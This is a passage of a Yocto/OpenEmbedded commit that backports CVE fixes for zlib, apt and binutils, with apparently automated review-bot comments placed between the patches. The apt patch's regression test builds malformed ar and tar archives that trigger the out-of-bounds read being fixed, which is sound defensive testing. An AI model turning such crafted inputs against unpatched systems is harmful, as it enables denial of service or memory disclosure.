++ * after 24*(n-2) bits have been consumed from sym_buf. sym_buf starts at
++ * 8*n bits into pending_buf. (Note that the symbol buffer fills when n-1
++ * symbols are written.) The closest the writing gets to what is unread is
++ * then n+14 bits. Here n is lit_bufsize, which is 16384 by default, and
++ * can range from 128 to 32768.
++ *
++ * Therefore, at a minimum, there are 142 bits of space between what is
++ * written and what is read in the overlain buffers, so the symbols cannot
++ * be overwritten by the compressed data. That space is actually 139 bits,
++ * due to the three-bit fixed-code block header.
++ *
++ * That covers the case where either Z_FIXED is specified, forcing fixed
++ * codes, or when the use of fixed codes is chosen, because that choice
++ * results in a smaller compressed block than dynamic codes. That latter
++ * condition then assures that the above analysis also covers all dynamic
++ * blocks. A dynamic-code block will only be chosen to be emitted if it has
++ * fewer bits than a fixed-code block would for the same set of symbols.
++ * Therefore its average symbol length is assured to be less than 31. So
++ * the compressed data for a dynamic block also cannot overwrite the
++ * symbols from which it is being constructed.
++ */
++
++ s->pending_buf = (uchf *) ZALLOC(strm, s->lit_bufsize, 4);
++ s->pending_buf_size = (ulg)s->lit_bufsize * 4;
+
+ if (s->window == Z_NULL || s->prev == Z_NULL || s->head == Z_NULL ||
+ s->pending_buf == Z_NULL) {
+@@ -340,8 +373,12 @@ int ZEXPORT deflateInit2_(strm, level, method, windowBits, memLevel, strategy,
+ deflateEnd (strm);
+ return Z_MEM_ERROR;
+ }
+- s->d_buf = overlay + s->lit_bufsize/sizeof(ush);
+- s->l_buf = s->pending_buf + (1+sizeof(ush))*s->lit_bufsize;
++ s->sym_buf = s->pending_buf + s->lit_bufsize;
++ s->sym_end = (s->lit_bufsize - 1) * 3;
++ /* We avoid equality with lit_bufsize*3 because of wraparound at 64K
++ * on 16 bit machines and because stored blocks are restricted to
++ * 64K-1 bytes.
++ */
+
+ s->level = level;
+ s->strategy = strategy;
+@@ -552,7 +589,7 @@ int ZEXPORT deflatePrime (strm, bits, value)
+
+ if (deflateStateCheck(strm)) return Z_STREAM_ERROR;
+ s = strm->state;
+- if ((Bytef *)(s->d_buf) < s->pending_out + ((Buf_size + 7) >> 3))
++ if (s->sym_buf < s->pending_out + ((Buf_size + 7) >> 3))
+ return Z_BUF_ERROR;
+ do {
+ put = Buf_size - s->bi_valid;
+@@ -1113,7 +1150,6 @@ int ZEXPORT deflateCopy (dest, source)
+ #else
+ deflate_state *ds;
+ deflate_state *ss;
+- ushf *overlay;
+
+
+ if (deflateStateCheck(source) || dest == Z_NULL) {
+@@ -1133,8 +1169,7 @@ int ZEXPORT deflateCopy (dest, source)
+ ds->window = (Bytef *) ZALLOC(dest, ds->w_size, 2*sizeof(Byte));
+ ds->prev = (Posf *) ZALLOC(dest, ds->w_size, sizeof(Pos));
+ ds->head = (Posf *) ZALLOC(dest, ds->hash_size, sizeof(Pos));
+- overlay = (ushf *) ZALLOC(dest, ds->lit_bufsize, sizeof(ush)+2);
+- ds->pending_buf = (uchf *) overlay;
++ ds->pending_buf = (uchf *) ZALLOC(dest, ds->lit_bufsize, 4);
+
+ if (ds->window == Z_NULL || ds->prev == Z_NULL || ds->head == Z_NULL ||
+ ds->pending_buf == Z_NULL) {
+@@ -1148,8 +1183,7 @@ int ZEXPORT deflateCopy (dest, source)
+ zmemcpy(ds->pending_buf, ss->pending_buf, (uInt)ds->pending_buf_size);
+
+ ds->pending_out = ds->pending_buf + (ss->pending_out - ss->pending_buf);
+- ds->d_buf = overlay + ds->lit_bufsize/sizeof(ush);
+- ds->l_buf = ds->pending_buf + (1+sizeof(ush))*ds->lit_bufsize;
++ ds->sym_buf = ds->pending_buf + ds->lit_bufsize;
+
+ ds->l_desc.dyn_tree = ds->dyn_ltree;
+ ds->d_desc.dyn_tree = ds->dyn_dtree;
+@@ -1925,7 +1959,7 @@ local block_state deflate_fast(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2056,7 +2090,7 @@ local block_state deflate_slow(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2131,7 +2165,7 @@ local block_state deflate_rle(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+@@ -2170,7 +2204,7 @@ local block_state deflate_huff(s, flush)
+ FLUSH_BLOCK(s, 1);
+ return finish_done;
+ }
+- if (s->last_lit)
++ if (s->sym_next)
+ FLUSH_BLOCK(s, 0);
+ return block_done;
+ }
+diff --git a/deflate.h b/deflate.h
+index 23ecdd312..d4cf1a98b 100644
+--- a/deflate.h
++++ b/deflate.h
+@@ -217,7 +217,7 @@ typedef struct internal_state {
+ /* Depth of each subtree used as tie breaker for trees of equal frequency
+ */
+
+- uchf *l_buf; /* buffer for literals or lengths */
++ uchf *sym_buf; /* buffer for distances and literals/lengths */
+
+ uInt lit_bufsize;
+ /* Size of match buffer for literals/lengths. There are 4 reasons for
+@@ -239,13 +239,8 @@ typedef struct internal_state {
+ * - I can't count above 4
+ */
+
+- uInt last_lit; /* running index in l_buf */
+-
+- ushf *d_buf;
+- /* Buffer for distances. To simplify the code, d_buf and l_buf have
+- * the same number of elements. To use different lengths, an extra flag
+- * array would be necessary.
+- */
++ uInt sym_next; /* running index in sym_buf */
++ uInt sym_end; /* symbol table full when sym_next reaches this */
+
+ ulg opt_len; /* bit length of current block with optimal trees */
+ ulg static_len; /* bit length of current block with static trees */
+@@ -325,20 +320,22 @@ void ZLIB_INTERNAL _tr_stored_block OF((deflate_state *s, charf *buf,
+
+ # define _tr_tally_lit(s, c, flush) \
+ { uch cc = (c); \
+- s->d_buf[s->last_lit] = 0; \
+- s->l_buf[s->last_lit++] = cc; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = 0; \
++ s->sym_buf[s->sym_next++] = cc; \
+ s->dyn_ltree[cc].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ # define _tr_tally_dist(s, distance, length, flush) \
+ { uch len = (uch)(length); \
+ ush dist = (ush)(distance); \
+- s->d_buf[s->last_lit] = dist; \
+- s->l_buf[s->last_lit++] = len; \
++ s->sym_buf[s->sym_next++] = dist; \
++ s->sym_buf[s->sym_next++] = dist >> 8; \
++ s->sym_buf[s->sym_next++] = len; \
+ dist--; \
+ s->dyn_ltree[_length_code[len]+LITERALS+1].Freq++; \
+ s->dyn_dtree[d_code(dist)].Freq++; \
+- flush = (s->last_lit == s->lit_bufsize-1); \
++ flush = (s->sym_next == s->sym_end); \
+ }
+ #else
+ # define _tr_tally_lit(s, c, flush) flush = _tr_tally(s, 0, c)
+diff --git a/trees.c b/trees.c
+index 4f4a65011..decaeb7c3 100644
+--- a/trees.c
++++ b/trees.c
+@@ -416,7 +416,7 @@ local void init_block(s)
+
+ s->dyn_ltree[END_BLOCK].Freq = 1;
+ s->opt_len = s->static_len = 0L;
+- s->last_lit = s->matches = 0;
++ s->sym_next = s->matches = 0;
+ }
+
+ #define SMALLEST 1
+@@ -948,7 +948,7 @@ void ZLIB_INTERNAL _tr_flush_block(s, buf, stored_len, last)
+
+ Tracev((stderr, "\nopt %lu(%lu) stat %lu(%lu) stored %lu lit %u ",
+ opt_lenb, s->opt_len, static_lenb, s->static_len, stored_len,
+- s->last_lit));
++ s->sym_next / 3));
+
+ if (static_lenb <= opt_lenb) opt_lenb = static_lenb;
+
+@@ -1017,8 +1017,9 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ unsigned dist; /* distance of matched string */
+ unsigned lc; /* match length-MIN_MATCH or unmatched char (if dist==0) */
+ {
+- s->d_buf[s->last_lit] = (ush)dist;
+- s->l_buf[s->last_lit++] = (uch)lc;
++ s->sym_buf[s->sym_next++] = dist;
++ s->sym_buf[s->sym_next++] = dist >> 8;
++ s->sym_buf[s->sym_next++] = lc;
+ if (dist == 0) {
+ /* lc is the unmatched char */
+ s->dyn_ltree[lc].Freq++;
+@@ -1033,30 +1034,7 @@ int ZLIB_INTERNAL _tr_tally (s, dist, lc)
+ s->dyn_ltree[_length_code[lc]+LITERALS+1].Freq++;
+ s->dyn_dtree[d_code(dist)].Freq++;
+ }
+-
+-#ifdef TRUNCATE_BLOCK
+- /* Try to guess if it is profitable to stop the current block here */
+- if ((s->last_lit & 0x1fff) == 0 && s->level > 2) {
+- /* Compute an upper bound for the compressed length */
+- ulg out_length = (ulg)s->last_lit*8L;
+- ulg in_length = (ulg)((long)s->strstart - s->block_start);
+- int dcode;
+- for (dcode = 0; dcode < D_CODES; dcode++) {
+- out_length += (ulg)s->dyn_dtree[dcode].Freq *
+- (5L+extra_dbits[dcode]);
+- }
+- out_length >>= 3;
+- Tracev((stderr,"\nlast_lit %u, in %ld, out ~%ld(%ld%%) ",
+- s->last_lit, in_length, out_length,
+- 100L - out_length*100L/in_length));
+- if (s->matches < s->last_lit/2 && out_length < in_length/2) return 1;
+- }
+-#endif
+- return (s->last_lit == s->lit_bufsize-1);
+- /* We avoid equality with lit_bufsize because of wraparound at 64K
+- * on 16 bit machines and because stored blocks are restricted to
+- * 64K-1 bytes.
+- */
++ return (s->sym_next == s->sym_end);
+ }
+
+ /* ===========================================================================
+@@ -1069,13 +1047,14 @@ local void compress_block(s, ltree, dtree)
+ {
+ unsigned dist; /* distance of matched string */
+ int lc; /* match length or unmatched char (if dist == 0) */
+- unsigned lx = 0; /* running index in l_buf */
++ unsigned sx = 0; /* running index in sym_buf */
+ unsigned code; /* the code to send */
+ int extra; /* number of extra bits to send */
+
+- if (s->last_lit != 0) do {
+- dist = s->d_buf[lx];
+- lc = s->l_buf[lx++];
++ if (s->sym_next != 0) do {
++ dist = s->sym_buf[sx++] & 0xff;
++ dist += (unsigned)(s->sym_buf[sx++] & 0xff) << 8;
++ lc = s->sym_buf[sx++];
+ if (dist == 0) {
+ send_code(s, lc, ltree); /* send a literal byte */
+ Tracecv(isgraph(lc), (stderr," '%c' ", lc));
+@@ -1100,11 +1079,10 @@ local void compress_block(s, ltree, dtree)
+ }
+ } /* literal or match pair ? */
+
+- /* Check that the overlay between pending_buf and d_buf+l_buf is ok: */
+- Assert((uInt)(s->pending) < s->lit_bufsize + 2*lx,
+- "pendingBuf overflow");
++ /* Check that the overlay between pending_buf and sym_buf is ok: */
++ Assert(s->pending < s->lit_bufsize + sx, "pendingBuf overflow");
+
+- } while (lx < s->last_lit);
++ } while (sx < s->sym_next);
+
+ send_code(s, END_BLOCK, ltree);
+ }
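Review bot: The `Upstream-Status: Backport` tag at the top of this patch names no upstream commit, unlike CVE-2022-37434.patch in the same directory, which links the commits it was taken from. The origin is only recoverable from the `From 5c44459c3b28a9bd3283aaceab7c615f8020c531` mbox line, which is presumably the upstream hash. The tag should carry it, e.g. `Upstream-Status: Backport [https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531]`. That lets an auditor diff this 347-line change to the pending_buf/sym_buf layout against its source when the recipe is rebased.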
diff --git a/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
new file mode 100644
index 0000000000..d29e6e0f1f
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2022-37434.patch
@@ -0,0 +1,44 @@
+From 8617d83d6939754ae3a04fc2d22daa18eeea2a43 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Wed, 17 Aug 2022 10:15:57 +0530
+Subject: [PATCH] CVE-2022-37434
+
+Upstream-Status: Backport [https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1 & https://github.com/madler/zlib/commit/1eb7682f845ac9e9bf9ae35bbfb3bad5dacbd91d]
+CVE: CVE-2022-37434
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+Fix a bug when getting a gzip header extra field with inflate().
+
+If the extra field was larger than the space the user provided with
+inflateGetHeader(), and if multiple calls of inflate() delivered
+the extra header data, then there could be a buffer overflow of the
+provided space. This commit assures that provided space is not
+exceeded.
+
+ Fix extra field processing bug that dereferences NULL state->head.
+
+The recent commit to fix a gzip header extra field processing bug
+introduced the new bug fixed here.
+---
+ inflate.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)
+
+diff --git a/inflate.c b/inflate.c
+index ac333e8..cd01857 100644
+--- a/inflate.c
++++ b/inflate.c
+@@ -759,8 +759,9 @@ int flush;
+ if (copy > have) copy = have;
+ if (copy) {
+ if (state->head != Z_NULL &&
+- state->head->extra != Z_NULL) {
+- len = state->head->extra_len - state->length;
++ state->head->extra != Z_NULL &&
++ (len = state->head->extra_len - state->length) <
++ state->head->extra_max) {
+ zmemcpy(state->head->extra + len, next,
+ len + copy > state->head->extra_max ?
+ state->head->extra_max - len : copy);
+--
+2.25.1
+
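Review bot: The header of this backport cannot be traced to one upstream commit: the `From` line carries 8617d83d6939754ae3a04fc2d22daa18eeea2a43, while `Upstream-Status` names two other commits joined with `&`, and the second commit's message is appended, indented, to the first. Splitting this into two patch files, one per upstream commit with its own hash and message, would make a later audit of the CVE fix straightforward. If they stay combined, say so explicitly in the description, for example `This patch combines upstream commits eff308af and 1eb7682f; the second fixes a NULL dereference introduced by the first.` The guarded `zmemcpy` sits in a function whose body starts and ends outside the inner hunk.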
diff --git a/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
new file mode 100644
index 0000000000..654579eb81
--- /dev/null
+++ b/meta/recipes-core/zlib/zlib/CVE-2023-45853.patch
@@ -0,0 +1,40 @@
+From 73331a6a0481067628f065ffe87bb1d8f787d10c Mon Sep 17 00:00:00 2001
+From: Hans Wennborg <hans@chromium.org>
+Date: Fri, 18 Aug 2023 11:05:33 +0200
+Subject: [PATCH] Reject overflows of zip header fields in minizip.
+
+This checks the lengths of the file name, extra field, and comment
+that would be put in the zip headers, and rejects them if they are
+too long. They are each limited to 65535 bytes in length by the zip
+format. This also avoids possible buffer overflows if the provided
+fields are too long.
+
+Upstream-Status: Backport from [https://github.com/madler/zlib/commit/73331a6a0481067628f065ffe87bb1d8f787d10c]
+CVE: CVE-2023-45853
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+---
+ contrib/minizip/zip.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/contrib/minizip/zip.c b/contrib/minizip/zip.c
+index 3d3d4cadd..0446109b2 100644
+--- a/contrib/minizip/zip.c
++++ b/contrib/minizip/zip.c
+@@ -1043,6 +1043,17 @@ extern int ZEXPORT zipOpenNewFileInZip4_64(zipFile file, const char* filename, c
+ return ZIP_PARAMERROR;
+ #endif
+
++ // The filename and comment length must fit in 16 bits.
++ if ((filename!=NULL) && (strlen(filename)>0xffff))
++ return ZIP_PARAMERROR;
++ if ((comment!=NULL) && (strlen(comment)>0xffff))
++ return ZIP_PARAMERROR;
++ // The extra field length must fit in 16 bits. If the member also requires
++ // a Zip64 extra block, that will also need to fit within that 16-bit
++ // length, but that will be checked for later.
++ if ((size_extrafield_local>0xffff) || (size_extrafield_global>0xffff))
++ return ZIP_PARAMERROR;
++
+ zi = (zip64_internal*)file;
+
+ if (zi->in_opened_file_inzip == 1)
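Review bot: The added comment in zipOpenNewFileInZip4_64 says the Zip64 extra block length "will be checked for later", but that later check is not in this hunk and the backport carries only the 11 added lines. Because the patch is applied to zlib 1.2.11 rather than the tree the upstream commit was written against, it is worth confirming that the check exists in this version's zip.c. Record the result in the patch description, for example `Note: the later Zip64 extra-block length check referred to in the comment is <present|absent> in 1.2.11.` The function body continues outside the hunk.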
diff --git a/meta/recipes-core/zlib/zlib_1.2.11.bb b/meta/recipes-core/zlib/zlib_1.2.11.bb
index ef9431ae47..9355f0556e 100644
--- a/meta/recipes-core/zlib/zlib_1.2.11.bb
+++ b/meta/recipes-core/zlib/zlib_1.2.11.bb
@@ -8,7 +8,10 @@ LIC_FILES_CHKSUM = "file://zlib.h;beginline=6;endline=23;md5=5377232268e952e9ef6
SRC_URI = "${SOURCEFORGE_MIRROR}/libpng/${BPN}/${PV}/${BPN}-${PV}.tar.xz \
file://ldflags-tests.patch \
+ file://CVE-2018-25032.patch \
file://run-ptest \
+ file://CVE-2022-37434.patch \
+ file://CVE-2023-45853.patch \
"
UPSTREAM_CHECK_URI = "http://zlib.net/"
@@ -50,3 +53,6 @@ do_install_append_class-target() {
}
BBCLASSEXTEND = "native nativesdk"
+
+# this CVE is for cloudflare zlib
+CVE_CHECK_WHITELIST += "CVE-2023-6992"
diff --git a/meta/recipes-devtools/apt/apt.inc b/meta/recipes-devtools/apt/apt.inc
index 13f5969f86..251795eeca 100644
--- a/meta/recipes-devtools/apt/apt.inc
+++ b/meta/recipes-devtools/apt/apt.inc
@@ -2,6 +2,7 @@ SUMMARY = "Advanced front-end for dpkg"
DESCRIPTION = "Provides command-line tools for searching and managing as well \
as querying information about packages as a low-level access to all features \
of the libapt-pkg library."
+HOMEPAGE = "https://packages.debian.org/jessie/apt"
LICENSE = "GPLv2.0+"
SECTION = "base"
@@ -17,6 +18,7 @@ SRC_URI = "https://launchpad.net/ubuntu/+archive/primary/+sourcefiles/${BPN}/${P
file://0001-environment.mak-musl-based-systems-can-generate-shar.patch \
file://0001-apt-1.2.12-Fix-musl-build.patch \
file://0001-Include-array.h-for-std-array.patch \
+ file://CVE-2020-3810.patch \
"
SRC_URI[md5sum] = "d30eed9304e82ea8238c854b5c5a34d9"
SRC_URI[sha256sum] = "03ded4f5e9b8d43ecec083704b2dcabf20c182ed382db9ac7251da0b0b038059"
@@ -35,5 +37,9 @@ do_configure_prepend() {
rm -rf ${S}/buildlib/config.guess
}
+# there are code generation issues with some compilers in the SHA256 implementation
+# turn off strict-aliasing to avoid these issues
+CXXFLAGS:append = " -fno-strict-aliasing"
+
USERADD_PACKAGES = "${PN}"
USERADD_PARAM_${PN} = "--system --no-create-home --home-dir /nonexistent --shell /bin/false --user-group _apt"
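Review bot: `CXXFLAGS:append` uses the colon override syntax, while the rest of this file uses the underscore form (`do_configure_prepend`, `USERADD_PARAM_${PN}`). Whether the bitbake on this branch accepts the colon form is not visible from here; for consistency I would write `CXXFLAGS_append = " -fno-strict-aliasing"`. The comment should also name the compilers or versions where the SHA256 code generation problem was seen, since apt's hash verification depends on that code being compiled correctly and the flag should be dropped once it is no longer needed.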
diff --git a/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
new file mode 100644
index 0000000000..cf1206a3fa
--- /dev/null
+++ b/meta/recipes-devtools/apt/apt/CVE-2020-3810.patch
@@ -0,0 +1,174 @@
+From dceb1e49e4b8e4dadaf056be34088b415939cda6 Mon Sep 17 00:00:00 2001
+From: Julian Andres Klode <julian.klode@canonical.com>
+Date: Tue, 12 May 2020 11:49:09 +0200
+Subject: [PATCH] SECURITY UPDATE: Fix out of bounds read in .ar and .tar
+ implementation (CVE-2020-3810)
+
+When normalizing ar member names by removing trailing whitespace
+and slashes, an out-out-bound read can be caused if the ar member
+name consists only of such characters, because the code did not
+stop at 0, but would wrap around and continue reading from the
+stack, without any limit.
+
+Add a check to abort if we reached the first character in the
+name, effectively rejecting the use of names consisting just
+of slashes and spaces.
+
+Furthermore, certain error cases in arfile.cc and extracttar.cc have
+included member names in the output that were not checked at all and
+might hence not be nul terminated, leading to further out of bound reads.
+
+Fixes Debian/apt#111
+LP: #1878177
+
+CVE: CVE-2020-3810
+
+Upstream-Status: Backport:
+https://salsa.debian.org/apt-team/apt/-/commit/dceb1e49e4b8e4dadaf056be34088b415939cda6
+
+Signed-off-by: Davide Gardenal <davide.gardenal@huawei.com>
+---
+apt-inst/contrib/arfile.cc | 11 ++-
+apt-inst/contrib/extracttar.cc | 2 +-
+.../test-github-111-invalid-armember | 88 +++++++++++++++++++
+ 3 files changed, 98 insertions(+), 3 deletions(-)
+ create mode 100755 test/integration/test-github-111-invalid-armember
+
+diff --git a/apt-inst/contrib/arfile.cc b/st/contrib/arfile.cc
+index 3fc3afedb..5cb43c690 100644
+--- a/apt-inst/contrib/arfile.cc
++++ b/apt-inst/contrib/arfile.cc
+@@ -92,7 +92,7 @@ bool ARArchive::LoadHeaders()
+ StrToNum(Head.Size,Memb->Size,sizeof(Head.Size)) == false)
+ {
+ delete Memb;
+- return _error->Error(_("Invalid archive member header %s"), Head.Name);
++ return _error->Error(_("Invalid archive member header"));
+ }
+
+ // Check for an extra long name string
+@@ -119,7 +119,14 @@ bool ARArchive::LoadHeaders()
+ else
+ {
+ unsigned int I = sizeof(Head.Name) - 1;
+- for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--);
++ for (; Head.Name[I] == ' ' || Head.Name[I] == '/'; I--)
++ {
++ if (I == 0)
++ {
++ delete Memb;
++ return _error->Error(_("Invalid archive member header"));
++ }
++ }
+ Memb->Name = std::string(Head.Name,I+1);
+ }
+
+diff --git a/apt-inst/contrib/extracttar.cc b/apt-inst/contrib/extracttar.cc
+index 9bb0a55c0..b22f59dbc 100644
+--- a/apt-inst/contrib/extracttar.cc
++++ b/apt-inst/contrib/extracttar.cc
+@@ -254,7 +254,7 @@ bool ExtractTar::Go(pkgDirStream &Stream)
+
+ default:
+ BadRecord = true;
+- _error->Warning(_("Unknown TAR header type %u, member %s"),(unsigned)Tar->LinkFlag,Tar->Name);
++ _error->Warning(_("Unknown TAR header type %u"), (unsigned)Tar->LinkFlag);
+ break;
+ }
+
+diff --git a/test/integration/test-github-111-invalid-armember b/test/integration/test-github-111-invalid-armember
+new file mode 100755
+index 000000000..ec2163bf6
+--- /dev/null
++++ b/test/integration/test-github-111-invalid-armember
+@@ -0,0 +1,88 @@
++#!/bin/sh
++set -e
++
++TESTDIR="$(readlink -f "$(dirname "$0")")"
++. "$TESTDIR/framework"
++setupenvironment
++configarchitecture "amd64"
++setupaptarchive
++
++# this used to crash, but it should treat it as an invalid member header
++touch ' '
++ar -q test.deb ' '
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++rm test.deb
++touch 'x'
++ar -q test.deb 'x'
++testsuccessequal "E: This is not a valid DEB archive, missing 'debian-binary' member" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# <name><size> [ other fields] - name is not nul terminated here, it ends in .
++msgmsg "Unterminated ar member name"
++printf '!<arch>\0120123456789ABCDE.A123456789A.01234.01234.0123456.012345678.0.' > test.deb
++testsuccessequal "E: Invalid archive member header" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
++
++
++# unused source code for generating $tar below
++maketar() {
++ cat > maketar.c << EOF
++ #include <stdio.h>
++ #include <string.h>
++ struct tar {
++ char Name[100];
++ char Mode[8];
++ char UserID[8];
++ char GroupID[8];
++ char Size[12];
++ char MTime[12];
++ char Checksum[8];
++ char LinkFlag;
++ char LinkName[100];
++ char MagicNumber[8];
++ char UserName[32];
++ char GroupName[32];
++ char Major[8];
++ char Minor[8];
++ };
++
++ int main(void)
++ {
++ union {
++ struct tar t;
++ char buf[512];
++ } t;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ t.buf[i] = '7';
++ memcpy(t.t.Name, "unterminatedName", 16);
++ memcpy(t.t.UserName, "userName", 8);
++ memcpy(t.t.GroupName, "thisIsAGroupNamethisIsAGroupName", 32);
++ t.t.LinkFlag = 'X'; // I AM BROKEN
++ memcpy(t.t.Size, "000000000000", sizeof(t.t.Size));
++ memset(t.t.Checksum,' ',sizeof(t.t.Checksum));
++
++ unsigned long sum = 0;
++ for (int i = 0; i < sizeof(t.buf); i++)
++ sum += t.buf[i];
++
++ int written = sprintf(t.t.Checksum, "%lo", sum);
++ for (int i = written; i < sizeof(t.t.Checksum); i++)
++ t.t.Checksum[i] = ' ';
++ fwrite(t.buf, sizeof(t.buf), 1, stdout);
++ }
++EOF
++
++ gcc maketar.c -o maketar -Wall
++ ./maketar
++}
++
++
++#
++tar="unterminatedName77777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777700000000000077777777777773544 X777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777userName777777777777777777777777thisIsAGroupNamethisIsAGroupName777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777"
++printf '%s' "$tar" | gzip > control.tar.gz
++cp control.tar.gz data.tar.gz
++touch debian-binary
++rm test.deb
++ar -q test.deb debian-binary control.tar.gz data.tar.gz
++testsuccessequal "W: Unknown TAR header type 88" ${BUILDDIRECTORY}/../test/interactive-helper/testdeb test.deb
+--
+GitLab
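Review bot: The inner header `diff --git a/apt-inst/contrib/arfile.cc b/st/contrib/arfile.cc` has a damaged second path, and the three diffstat lines above it have lost their leading space, which suggests the patch was edited by hand after export. Tools that read the `---`/`+++` lines will probably still apply it, but the header should read `diff --git a/apt-inst/contrib/arfile.cc b/apt-inst/contrib/arfile.cc`. Regenerating the file from the upstream commit would rule out other unnoticed edits in a security fix. `Upstream-Status: Backport:` with the URL on the following line also differs from the bracketed form the other patches in this commit use, `Upstream-Status: Backport [URL]`.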
diff --git a/meta/recipes-devtools/binutils/binutils-2.34.inc b/meta/recipes-devtools/binutils/binutils-2.34.inc
index b5f5a1c69a..032263fe63 100644
--- a/meta/recipes-devtools/binutils/binutils-2.34.inc
+++ b/meta/recipes-devtools/binutils/binutils-2.34.inc
@@ -24,7 +24,7 @@ BRANCH ?= "binutils-2_34-branch"
UPSTREAM_CHECK_GITTAGREGEX = "binutils-(?P<pver>\d+_(\d_?)*)"
-SRCREV ?= "d4b50999b3b287b5f984ade2f8734aa8c9359440"
+SRCREV ?= "c4e78c0868a22971680217a41fdb73516a26813d"
BINUTILS_GIT_URI ?= "git://sourceware.org/git/binutils-gdb.git;branch=${BRANCH};protocol=git"
SRC_URI = "\
${BINUTILS_GIT_URI} \
@@ -42,7 +42,25 @@ SRC_URI = "\
file://0015-sync-with-OE-libtool-changes.patch \
file://0016-Check-for-clang-before-checking-gcc-version.patch \
file://0017-binutils-drop-redundant-program_name-definition-fno-.patch \
+ file://0018-Include-members-in-the-variable-table-used-when-reso.patch \
file://CVE-2020-0551.patch \
file://0001-gas-improve-reproducibility-for-stabs-debugging-data.patch \
+ file://CVE-2020-16592.patch \
+ file://CVE-2020-16598.patch \
+ file://CVE-2021-20197.patch \
+ file://CVE-2021-3487.patch \
+ file://CVE-2021-3549.patch \
+ file://CVE-2020-16593.patch \
+ file://0001-CVE-2021-45078.patch \
+ file://CVE-2022-38533.patch \
+ file://CVE-2023-25588.patch \
+ file://CVE-2021-46174.patch \
+ file://CVE-2023-25584.patch \
+ file://CVE-2022-47007.patch \
+ file://CVE-2022-47008.patch \
+ file://CVE-2022-47010.patch \
+ file://CVE-2022-47011.patch \
+ file://CVE-2022-48063.patch \
+ file://CVE-2022-47695.patch \
"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
new file mode 100644
index 0000000000..2af82477ac
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/0001-CVE-2021-45078.patch
@@ -0,0 +1,257 @@
+From 161e87d12167b1e36193385485c1f6ce92f74f02 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Wed, 15 Dec 2021 11:48:42 +1030
+Subject: [PATCH] PR28694, Out-of-bounds write in stab_xcoff_builtin_type
+
+ PR 28694
+ * stabs.c (stab_xcoff_builtin_type): Make typenum unsigned.
+ Negate typenum earlier, simplifying bounds checking. Correct
+ off-by-one indexing. Adjust switch cases.
+
+
+CVE: CVE-2021-45078
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=161e87d12167b1e36193385485c1f6ce92f74f02]
+
+Signed-off-by: Sundeep KOKKONDA <sundeep.kokkonda@gmail.com>
+Signed-off-by: Purushottam Choudhary <purushottam.choudhary@kpit.com>
+Signed-off-by: Purushottam Choudhary <purushottamchoudhary29@gmail.com>
+---
+ binutils/stabs.c | 87 ++++++++++++++++++++++++------------------------
+ 1 file changed, 43 insertions(+), 44 deletions(-)
+
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 274bfb0e7fa..83ee3ea5fa4 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -202,7 +202,7 @@ static debug_type stab_find_type (void *, struct stab_handle *, const int *);
+ static bfd_boolean stab_record_type
+ (void *, struct stab_handle *, const int *, debug_type);
+ static debug_type stab_xcoff_builtin_type
+- (void *, struct stab_handle *, int);
++ (void *, struct stab_handle *, unsigned int);
+ static debug_type stab_find_tagged_type
+ (void *, struct stab_handle *, const char *, int, enum debug_type_kind);
+ static debug_type *stab_demangle_argtypes
+@@ -3496,166 +3496,167 @@ stab_record_type (void *dhandle ATTRIBUTE_UNUSED, struct stab_handle *info,
+
+ static debug_type
+ stab_xcoff_builtin_type (void *dhandle, struct stab_handle *info,
+- int typenum)
++ unsigned int typenum)
+ {
+ debug_type rettype;
+ const char *name;
+
+- if (typenum >= 0 || typenum < -XCOFF_TYPE_COUNT)
++ typenum = -typenum - 1;
++ if (typenum >= XCOFF_TYPE_COUNT)
+ {
+- fprintf (stderr, _("Unrecognized XCOFF type %d\n"), typenum);
++ fprintf (stderr, _("Unrecognized XCOFF type %d\n"), -typenum - 1);
